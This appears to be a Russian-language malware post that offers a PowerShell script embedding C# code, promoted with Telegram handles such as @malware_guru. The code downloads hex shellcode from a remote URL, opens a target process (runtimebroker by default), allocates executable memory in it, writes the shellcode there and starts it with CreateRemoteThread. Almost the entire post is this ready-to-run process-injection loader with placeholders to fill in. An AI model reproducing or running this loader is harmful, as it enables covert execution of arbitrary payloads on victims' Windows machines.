Считывает шестнадцатеричный шелл-код с веб-страницы и выполняет его.
Для корректного разбора и выполнения скриптом шеллкод должен иметь такой формат: "E8 C0 A7 00 00 C0 A7 00 00 1C 61 48 9D 44 18 90 EB 6B D4 8D B1 34 EF B9 74 B3 92 58 8E BA 78 ED 40 3B"
Телеграм:
@RooseveltRow
@eby_usa
@malware_guru
@lazarus_bear
@HiddenCobra666
Для корректного разбора и выполнения скриптом шеллкод должен иметь такой формат: "E8 C0 A7 00 00 C0 A7 00 00 1C 61 48 9D 44 18 90 EB 6B D4 8D B1 34 EF B9 74 B3 92 58 8E BA 78 ED 40 3B"
Код:
$csharpCode = @"
using System;
using System.Net.Http;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
using System.Net;
using System.Diagnostics;
using System.Linq;
namespace Inject
{
public class Program
{
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, uint processId);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
const uint PROCESS_ALL_ACCESS = 0x001F0FFF;
const uint MEM_COMMIT = 0x00001000;
const uint PAGE_EXECUTE_READWRITE = 0x40;
public static void Main()
{
string processName = "runtimebroker"; //replace with desired running process
string shellcodeUrl = "www.example.com/myshellcode.txt"; //replace with your url
uint pid = GetProcessId(processName);
if (pid == 0)
{
Console.WriteLine("Failed to find the process.");
return;
}
byte[] shellcode = DownloadShellcode(shellcodeUrl);
if (shellcode.Length == 0)
{
Console.WriteLine("Failed to download or parse shellcode.");
return;
}
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
if (hProcess == IntPtr.Zero)
{
Console.WriteLine("Failed to open the target process.");
return;
}
IntPtr pShellcode = VirtualAllocEx(hProcess, IntPtr.Zero, (uint)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (pShellcode == IntPtr.Zero)
{
Console.WriteLine("Failed to allocate memory in the target process.");
return;
}
int lpNumberOfBytesWritten; // Declare the variable
if (!WriteProcessMemory(hProcess, pShellcode, shellcode, (uint)shellcode.Length, out lpNumberOfBytesWritten))
{
Console.WriteLine("Failed to write to the target process memory.");
return;
}
IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, pShellcode, IntPtr.Zero, 0, IntPtr.Zero);
if (hThread == IntPtr.Zero)
{
int errorCode = Marshal.GetLastWin32Error();
Console.WriteLine("Failed to create a remote thread in the target process. Error Code: " + errorCode);
return;
}
Console.WriteLine("Shellcode injected successfully.");
}
static uint GetProcessId(string processName)
{
string nameWithoutExtension = System.IO.Path.GetFileNameWithoutExtension(processName);
Process[] processes = Process.GetProcessesByName(nameWithoutExtension);
return processes.Length > 0 ? (uint)processes[0].Id : 0;
}
static byte[] DownloadShellcode(string url)
{
string shellcodeString = new WebClient().DownloadString(url);
return ParseShellcode(shellcodeString);
}
static byte[] ParseShellcode(string shellcodeString)
{
return shellcodeString.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries)
.Select(s => Convert.ToByte(s, 16))
.ToArray();
}
}
}
"@
$assemblyReferences = @(
'System.Net.Http',
'System.Runtime.InteropServices'
)
$addedType = Add-Type -TypeDefinition $csharpCode -Language CSharp -ReferencedAssemblies $assemblyReferences -PassThru
$addedType
$addedType::Main().Wait()Телеграм:
@RooseveltRow
@eby_usa
@malware_guru
@lazarus_bear
@HiddenCobra666